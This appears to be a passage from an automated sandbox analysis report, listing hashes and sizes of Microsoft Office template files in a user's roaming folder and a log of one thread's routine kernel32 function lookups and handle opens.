SHA1: 24437f20e0bb9c77326cb6b08ff67de466ab1795 SHA256: 2c65398b797782dbda743edf269d5ee1a24540b65437d37896ae435af8413bd1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090434[[fn=wood type]].thmx | 1.57 MB |
MD5:
c1587dbe39c33e5bbbe5baad4186f86c
SHA1: 4785766c81ee062924ebdc9086971fdfadef8fba SHA256: 38aa5633e615b85cb386d7e860b02414e5a32f28e0decc73c90d6f85e8eb97d1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457444[[fn=basis]].thmx | 545.48 KB |
MD5:
9e11fde89f689aa45e7f07013490b150
SHA1: 95f7f286411b5a11bdb3833932a315bf0fe0b678 SHA256: 224f658a958eadff784baea8710f1849017b31d1a75eb0b377b701e64baead51 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457464[[fn=dividend]].thmx | 558.05 KB |
MD5:
76051fa29994c47ed57de1bb58d1ff6c
SHA1: 3d84055384400a9b11d045b127b9fe17d343347e SHA256: 4d3c3b324b7cad1ad828ce043f1b1d7ee376ad673673d49df58d451dc05752d5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457475[[fn=frame]].thmx | 511.31 KB |
MD5:
b8a5cd8176c89adc3a4a2193363e526b
SHA1: 89900d82dd654072ab503cfde4eaeb40509728ec SHA256: 9c68e2acd9e948583e47cbfce132330279e89f256786b8842b7f6ca8c3044f14 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457485[[fn=mesh]].thmx | 2.94 MB |
MD5:
f32b086c758f97a8a0bb563ee69e4b63
SHA1: 1d409d3907633a2e27bcc17d4c48a7f1eb781f71 SHA256: 6b6a783f9d5b827382a314e986ed85da31ced3b15f63d7612907ee457956a479 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457491[[fn=metropolitan]].thmx | 759.94 KB |
MD5:
3e8cae1f2393464a34304036dba60940
SHA1: d37c5d8ed5894482a76090989993436891bf6e3c SHA256: fb624f682c47a2436917519ed5276fcfeb5fc1d47e2000d2170fc7e5372bf673 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457496[[fn=parallax]].thmx | 903.53 KB |
MD5:
d83998fdc7808e89dfe49d74095695ce
SHA1: d254449176173cf448bd35d5712a4d8b3aa6f477 SHA256: 1f5b9e9180c1c85f6618dc8ce67f5b4926b7f8a0f682434ad5979b8d7972ded2 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457503[[fn=quotable]].thmx | 944.81 KB |
MD5:
2df1f26ee11ea5b50f80a441a9e731be
SHA1: 978732ff8c2cef5e3b5ca75b870fc64a50c10891 SHA256: 3bd8c57275a9e130e4ee82307266b8b03e478d13984807ca074f0d060d1718c9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457510[[fn=savon]].thmx | 1.15 MB |
MD5:
75ca266e3f3744d3fa062938118a607e
SHA1: 5d699a89ef8627a1fed8b69c72a329ce2ce3e28d SHA256: 7573db225fed45775ef359c2af5092cdaa0ece59cc0c2bb373c1e7b46ecdf990 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457515[[fn=view]].thmx | 475.72 KB |
MD5:
ea3ce48fb687aed6551a5a06374da0f1
SHA1: cc603efec870ecec299af84ac10ee3a214db3374 SHA256: 33bee6160e3856a28b21d054286efcadc93641945eb98433cde11c226e0684c1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033917[[fn=berlin]].thmx | 953.66 KB |
MD5:
8a820622207844e096523f1393cdae03
SHA1: 14a9aa68d0f51c6f2e92c6ccbe4ee9e06a727cdb SHA256: 8cafd429239e4a4249f961da17f8e10699406f1ed7a719dcb99f9d8b926248d7 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033919[[fn=circuit]].thmx | 1.40 MB |
MD5:
4199138446736e1d694428c3eeae187d
SHA1: b476989fd42a8126cf61821b66147753a4567de6 SHA256: f85935c1c1a7e3594d542f1dfba95941e361fb10edfafe753e6b7dbadbe8b2d2 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033921[[fn=damask]].thmx | 2.12 MB |
MD5:
334003e3df3ca09c1540157cd4158114
SHA1: ae1490e95ee5061599003a39fc724f4d4fd604c2 SHA256: e742b597c04f5484202e8d7854bd777f16c96e98241a3cc00ae89a4a1c64624c |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033925[[fn=droplet]].thmx | 1.67 MB |
MD5:
34efa048b3ea9ebd0f9a1b2f1f37cd85
SHA1: 02950b2a44a2972b2d69afdc266bf50fef730ad9 SHA256: 4d223b5e94dab1176ac233043fd51750064212940d265b99e3c439ef5c516711 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033927[[fn=main event]].thmx | 2.79 MB |
MD5:
71e673229d545afcd21d0e9eabff13e4
SHA1: 98ba76cba61fddc2f606443df931f07255c3223f SHA256: 8e1b79a3213495106d1eb8192f083c7860378d49b6056a478aa84b0401ce184e |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033929[[fn=slate]].thmx | 2.25 MB |
MD5:
140c122d2ab26e66817b466057e3e2cd
SHA1: 3cc83dff9bf971c5e6998ae560e4a953af99a788 SHA256: 7d7005ccc956843608a7769e6dabfa4bf8d5daa3d1be1406ff48cabfccd1a0f1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm04033937[[fn=vapor trail]].thmx | 3.44 MB |
MD5:
6caabb81f15acdbe301f98beaa14ddd6
SHA1: 5b12a4305f7c414f41896ca2f9eabbfeb7a14472 SHA256: d21c0832a97db8966be533ffe1b3e40310a23c5de9f7cfbda389357bc0be7f8b |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001103[[fn=headlines]].thmx | 527.48 KB |
MD5:
77772fdda18533fb399d31a79b5bd41e
SHA1: 93c58461bbadf31716de1c0664c4c4e617cf7e85 SHA256: 0ffc7ee508c3fbf97a3e797ca314e5170049315a560cee0a11b4040d84bc45ef |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001104[[fn=feathered]].thmx | 1.96 MB |
MD5:
13d3b94fc0d7f2c3f6bf1af906f3de06
SHA1: 9a7ab73c4fbd36429ee0ec30b72be0de0639f6c7 SHA256: 187f252095ef5fd6c4635efc0d37e8e4cbe672cfa6b0ebfc07568427e6c641ee |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001105[[fn=crop]].thmx | 524.55 KB |
MD5:
a658ab33e435b66271ff2735070bc1ae
SHA1: 3bf521890aedc02e37ce1ae90156e6cc5a3d2675 SHA256: 098370223da5fe1d7e241a5572cf485d3ffa525622241c67b655eafe55fcb5d6 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001114[[fn=gallery]].thmx | 1.04 MB |
MD5:
0e137e1a97d9ece35730a1bcc5c725e4
SHA1: 091f9b513026a523221524ba9c647866334ab79e SHA256: cef0ceb911413c1d37ed2bb2dca1843bca1270ee45852b2d0e100358de6982e5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm10001115[[fn=parcel]].thmx | 594.39 KB |
MD5:
aae7bfa272d494f8a82fb221e38c6152
SHA1: bb22016a715ba32cf1bb3855d15daad070ebee11 SHA256: 4e1c176116fd1c184456cbc72f5a9ae28ac423b7b766f54c02e99505137b5230 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm16401371[[fn=atlas]].thmx | 838.08 KB |
MD5:
089003123a93a54095b84c782d64cc0d
SHA1: f052a9cbb0bfc268d99eb2460563b52a9b8c454f SHA256: 12f1e3598c7bea2668f7fcf6e28401c14b71996cf821d494e93ba39240a1013f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328884[[fn=architecture]].glox | 6.17 KB |
MD5:
c8ccb0a33a1e89dbae2b8a2c80dfbb54
SHA1: 49c842e354f3f3e945d4cc9c63cb76123911d05d SHA256: ba0f111a8bfb4b89e0e14e2a311ba0373f347f8885c48b5515550053b0c719e9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328893[[fn=bracketlist]].glox | 4.45 KB |
MD5:
ac89297bf30514673fe1965b317310f8
SHA1: c599ede6b5c90303e53edd11452da9af15b1749d SHA256: 566af0bc0d7c2537f74cb82bd8b1d261329c1828cc9af022f930bde043502424 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328905[[fn=chevron accent]].glox | 4.67 KB |
MD5:
ee0ad0d74bc343bb765993d1e1927715
SHA1: 0413b48c305fb886df035054555a734d90cd5712 SHA256: dc41363805e06bf8192b53d2874b5bcbf673b784c6ecbbc2a41a717152e0f3d0 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328908[[fn=circle process]].glox | 16.94 KB |
MD5:
c73c05a2b3d08f3c835e46022e6a0995
SHA1: 01fad837e31568dd910860ca806513d060c22ab4 SHA256: b9dcd3cbc5850bd8cd3dca901035e17c037194f787db7ea23c191bde84a3dbf6 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328916[[fn=converging text]].glox | 11.64 KB |
MD5:
8d05ce5a1d952e77a66b7745521c9a4e
SHA1: 7a724bfa431318a9f2c5e1a5053e94d5374fd0d5 SHA256: d5dff5e3ebb526a3bc72bd6e842269a55ec3bbf222f3dcbda6e659a4b5b83ad3 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328919[[fn=hexagon radial]].glox | 6.41 KB |
MD5:
8c99449400a45e9860609fb3ed01c5d2
SHA1: f0b667e7c29495a3b28fea23ea0cb11e72312288 SHA256: 16c30fde40e946ea1533e2b31b7de34d039b375abf93b3e25ec33b726b2b94c5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328925[[fn=interconnected block process]].glox | 9.50 KB |
MD5:
b95e65f7df800345595d282671783967
SHA1: 2d6593fab6565a1b77a87e298e55fa3cd5e82907 SHA256: 659b1be0f0e31374485765126ca102fcef1dac8a742b54993e64e9192486991d |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328932[[fn=picture frame]].glox | 4.75 KB |
MD5:
ed2268e6b7d03e19b10bc51cbe48dfee
SHA1: 6be77f4cd704e4322d8371413bd4eb5ac4a8ee88 SHA256: 8b80d60311bdf13af368abc18be54f1e4d02e51ba2561c6f6ffcd5d724f0228d |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328935[[fn=picture organization chart]].glox | 7.72 KB |
MD5:
8b843a80f395b6d6c95278f33d963dc2
SHA1: 9c6e8529d59af49bc428eb27fb1884413d95c052 SHA256: 7705434148324bb8554deee1b4546563653933962f8e75ca070ae641073607f7 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328940[[fn=radial picture list]].glox | 5.98 KB |
MD5:
53a3b1d5f08fc78d58f7a329b24c12f0
SHA1: 2aa4a8e306629ccde7bee321602fc2d3d6b1d055 SHA256: c5d06fab058d226bc0c7f01b404fa0e9f1bdcf602ee5c8ec0629d39e99eda707 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328951[[fn=tabbed arc]].glox | 4.12 KB |
MD5:
7e32ad78273a5800adcbac60ed9086a1
SHA1: 0a020eb56ab0b3de706b6e7d5af9beb7aaa03690 SHA256: dd80735eba4ded6b972e6b1c55b177efe94b326e8dd06698ff3748365eab2fb5 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328972[[fn=tab list]].glox | 5.30 KB |
MD5:
c3d72112eda09f922641157694a0e612
SHA1: 50511a09958d40049549fefe2bd5c5b975616bfe SHA256: 4e8e5ac549866c26c81e947952a3ed965bd5f0d6e4092b18fe2de37f5940d240 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328975[[fn=theme picture accent]].glox | 6.81 KB |
MD5:
bb2d0dc89e3924acd43385d5249aa377
SHA1: ac603d8e4aa8bc5c79bda9b07bdcdea2ff93d918 SHA256: 8219e86680e9d0264519035febab5c01c80590cc1fd474e678e372114a252280 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328983[[fn=theme picture alternating accent]].glox | 6.02 KB |
MD5:
3a5287118dcdce143e892c08edb5f41e
SHA1: b6d77ac878cdcf6dc65a48ce5942429eb7aa4901 SHA256: 3d0c69b04acdfe8095fb2da534d655b90e6963c85d3c7f0c1d6a79cf905eb100 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328986[[fn=theme picture grid]].glox | 6.58 KB |
MD5:
8d080a225a342e59d2e903077cd8ade2
SHA1: 8ff8379435f7cd191fe5ed7a2e3a2609293af53f SHA256: 6e67cf55d3dea09524b4a8e392d25ebab6d61ac6bb83d6a151bfe42174707b26 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328990[[fn=varying width list]].glox | 3.53 KB |
MD5:
00083f810194ec80949ea2b015deb10a
SHA1: 8c05ef9d80129a24c205b88f59d3c1ff7c460597 SHA256: 01715d366fa966d99797f59fa1f915d63882bc3eca9422ce1e6071fd57d11892 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328998[[fn=rings]].glox | 5.55 KB |
MD5:
7b5463e779c711141bdb0aab95e6c291
SHA1: 31df7fa39a30c29bc7277132e3c015111e245f85 SHA256: 361e1f51dedfdc09067da71162bc5f157c6fbef0939389b471a2d8eae0fa501e |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851216[[fn=apasixtheditionofficeonline]].xsl | 325.97 KB |
MD5:
3f7678f540f2feebf27d6ae9187ee201
SHA1: 7b37f9e01b0f6943b8b0f20543d86a2349dbf0f5 SHA256: 5230eee8d3b9babf936d7b07aaf5b6d4cf91e44ca6273c7eba80cd995997cca1 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851217[[fn=chicago]].xsl | 290.23 KB |
MD5:
7c9bab85dc6f44b0680870236dc39797
SHA1: 6a4490193648de3a10a2651d4c0b7859d1ab7ca9 SHA256: 192ba13f790df8e2ddbf36abb23675c6538da6edc1e435701694aafd9e2461cb |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851218[[fn=gb]].xsl | 262.55 KB |
MD5:
3813e117db4e799353de8276040b766f
SHA1: db184f39e76e62672814a03bb41d293141bbd2c1 SHA256: f92abd100dc162b2ba2d2a38f6611d1918c0a9aa9bd8cc6a819b94bfb8c9019e |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851219[[fn=gostname]].xsl | 250.47 KB |
MD5:
b1aa46c87dc394a091e2a55110200a9b
SHA1: 6f55b2afafeb26ae792e70c0e8cffaa372b60812 SHA256: 348ce98e1dfcfe6106cbc6ad1a57721d54b16d018b921cf5ac5888d64bd105e8 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851220[[fn=gosttitle]].xsl | 245.67 KB |
MD5:
f5eb849610408d7bc90b352a583c9429
SHA1: 1a6c2c0ef4c95b9a40669b89bc484871ebccd65d SHA256: d38622af4b4854bd60ebf74778ccda9bf60f1948b88d4425f94a6d8349875513 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851221[[fn=harvardanglia2008officeonline]].xsl | 278.27 KB |
MD5:
2ce52392f75c2a1c91bf934bc9abcfc7
SHA1: 9c01a309d640215edc93a67c6a2ced756dcb33e5 SHA256: 4f8945769454598b2deac94cc77fbe988a4dbc8a298ea4792478e5997f1d63e9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851222[[fn=ieee2006officeonline]].xsl | 287.81 KB |
MD5:
c318ee90423b931bd4cb146deeb53295
SHA1: c1381fe7719896a21d6b2ac340224728d28ef610 SHA256: 0d4099b710ed54a47a2ecda28a1cc0284c0230988fa46044471a107e9df4e184 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851223[[fn=iso690]].xsl | 264.39 KB |
MD5:
51a4d4d28d7cc5a5eef8212bee0fa975
SHA1: e832d5deaeac4ecd43953a59c76aac9f924a504f SHA256: c5ef49dee0bd8dd02e4c8bc0e3824b673a097a9fc7009fc562efb8df1aab03b9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851224[[fn=iso690nmerical]].xsl | 212.58 KB |
MD5:
379d083a1602eee30923c25a8031a9d0
SHA1: c840d2751a91ec18b8666507e212f71fe49bfed6 SHA256: 9a94a549d2df12ea627b1e4eb19f92ccf17ff5fe7e830c2d33449904b45ab87f |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851225[[fn=mlaseventheditionofficeonline]].xsl | 249.42 KB |
MD5:
4b2043e07bdf5596e6197487f9f40d34
SHA1: 8e62bffd6f0c95864f45b0b1babdb9cc4a2ee4fa SHA256: 9b9bec6b49991d9a439ca510b1de52021cea0bb8960669ea22af4518c2b8f4ab |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851226[[fn=turabian]].xsl | 336.75 KB |
MD5:
44062a35b792b4bf1e57e17a325058ee
SHA1: f7dd767a91869f10f978f2fc79d571df9ead2ad9 SHA256: 82ae22d960a05e49e6b310f9207cdd49d429cea525059bcefb08256bafb289f2 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851227[[fn=sist02]].xsl | 245.62 KB |
MD5:
be9be8e8185b1db91ee795e30c85f256
SHA1: 005003743237d086c1c3ee11fb86030bc314ab35 SHA256: 92c2d90539a79c193613f76edf4208c59c70adc5de101e0dc0ef21ac794bc2b8 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm01840907[[fn=equations]].dotx | 51.14 KB |
MD5:
c0f7cf1e3a872e16426d93beb364e06b
SHA1: 75b1316d4c8f93c7d49768e7b5e835c850985b3c SHA256: bb4a654c0f191513789f4f013f1122b1cbaeac16dcdbef6d71a79f2de448f01a |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835231[[fn=text cover with toc (student report blue design)]].docx | 60.73 KB |
MD5:
b869abad1cb2199f2195b4b5ec4d462a
SHA1: 52098cf58ca2901d5a40d58dd59784d53213eeca SHA256: 3f9e268bb8cd8d4d5190cda23992125947e255ac902b43c0e51418684ef9f492 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835232[[fn=text cover (student report blue design)]].docx | 57.17 KB |
MD5:
fa72bf3a655b4c5affc16a70a93bea15
SHA1: ccab411d9d9cd942d51c88b2f7cd91eda572c60c SHA256: 8073145784513807066d12a4b5548c5f43bbd757078f96e1fd808dfe4a25bfc3 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835233[[fn=text sidebar (annual report red and black design)]].docx | 46.70 KB |
MD5:
78e72cd292c5351eca5a8375a13457e6
SHA1: 2a3ed44e144636294684441b40f0036ae3820fa5 SHA256: 5af907563eba64470e8671bd0043a88a7bb0641215a7761d3e312d7b8f85e621 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835264[[fn=cover page (annual report red and black design)]].docx | 58.22 KB |
MD5:
e673fd9791f449b78ba95a84be2c3e45
SHA1: 49b1ff7ffa4a651dad8258802be372915ccb1245 SHA256: 23dced46bccd630948415d819aac4135629e178bedf6ff80785534f8ca5b1754 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835265[[fn=cover page (annual report timeless design)]].docx | 57.66 KB |
MD5:
6e26733cbce8340543b8eb230088fef6
SHA1: 1e188f87bc4dec473b7756285fe29de238f4d931 SHA256: f52af90c611a18e2c8f51635d42bff50e4162ba1fd8da13f43962654942cf198 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835266[[fn=cover letter (chronological resume simple design)]].docx | 56.11 KB |
MD5:
0e39b656e93e1f2d94474fc53ce861f4
SHA1: 5fa79a49ebcd3d308b475323afb1e8bdce0aa648 SHA256: 50c22d6a352e410ba7c7a735115ac3bff327158e7640659c3100e720d3726521 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835267[[fn=cover with logo (annual report red and black design)]].docx | 62.42 KB |
MD5:
1256509515d9827654d834f1184d3f7a
SHA1: 6008657a375eb6430ea942b8fe5029a87b49564d SHA256: 533091ded7c4fcaef3fae1b8032b61eb5991345dc27cc6146b12595ec8568277 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835268[[fn=photo cover (student report blue design)]].docx | 314.64 KB |
MD5:
14b5315288999531d81f9314e7e34776
SHA1: f44a6a7ccd4ac23dfe6831816e3a12e2627c69c8 SHA256: d601b2996924f0f8fd2bcd3524b03bcaa4c18e35a7f018d75af8bca9c0ec4a1e |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835269[[fn=photo cover with toc (student report blue design)]].docx | 307.30 KB |
MD5:
eab6473a699d1159127435b25e8bc96c
SHA1: 6d98a3ce80d7e37ff2915d29315a5283d22472c7 SHA256: 243adc5ea466e188024d5c4fbd7efd2015d416af72f7c588122f9f0f1d3057ba |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835270[[fn=photo sidebar (annual report red and black design)]].docx | 226.34 KB |
MD5:
d53cd613cffabd7504960f313af39bfd
SHA1: cf82d8f7ed6e7d1f179a0372a8715ce2ea0781ab SHA256: 37a0d1fd5249d3b46754cc02db73add8ef6633935f289c6f0d072c55e3ae31c6 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835271[[fn=sample table (annual report red and black design)]].docx | 29.44 KB |
MD5:
25e86197f269606061e99c525b826b9d
SHA1: fb1fb02b7866d5d58e7863e39ac1fe52af7b4c1c SHA256: 08e70e5b5086a7850624dd67a23db8546e9a014e3b84194cc143d9c6d4e75960 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835272[[fn=sample table (annual report timeless design)]].docx | 44.88 KB |
MD5:
61388293531b46cd5f842f527b2f9c4f
SHA1: 7e6c8d8ee04c8bd786a38e503a833b087cb480ae SHA256: fba55f3ce489ff3e3cfd43287a9c69c11d80c8480f0075dda9a0e517670455b0 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02836362[[fn=cover letter (resume timeless design)]].docx | 50.31 KB |
MD5:
22854804b436b218cc99ab26875eb0a0
SHA1: 1b127643d3a961e45bdd3e0d27e7fa12462d8fbc SHA256: 7bd6a51d444bdd7104c5ca3f528e03cc79e4c6c15d65c8158d7cef38669fe969 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998158[[fn=element]].dotx | 34.12 KB |
MD5:
612b1dc58dbcfbfd17bfad854fb703f5
SHA1: 724806bfdeba99459533cb105f7444d23bd86283 SHA256: 950496b0baa7be92a9ebc70acf6e40b02ffe0ae7db72b674741fd97002dce3f0 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998159[[fn=insight]].dotx | 2.10 MB |
MD5:
be5b4996fd89147059141be0f4f7aaad
SHA1: d6d318d3d3b7585dda2417a77dc05928573c500d SHA256: e03a9bb3500e1ebb9a09e27b3eb88784bf500357200bf38245364db6f267a7c0 |
|
|
Threads
Thread 0xfdc
833
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75c0a980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75c07570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75c09e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75c14ff0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x770dd830 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x770dd830 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75bf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x770df730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x770dd830 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
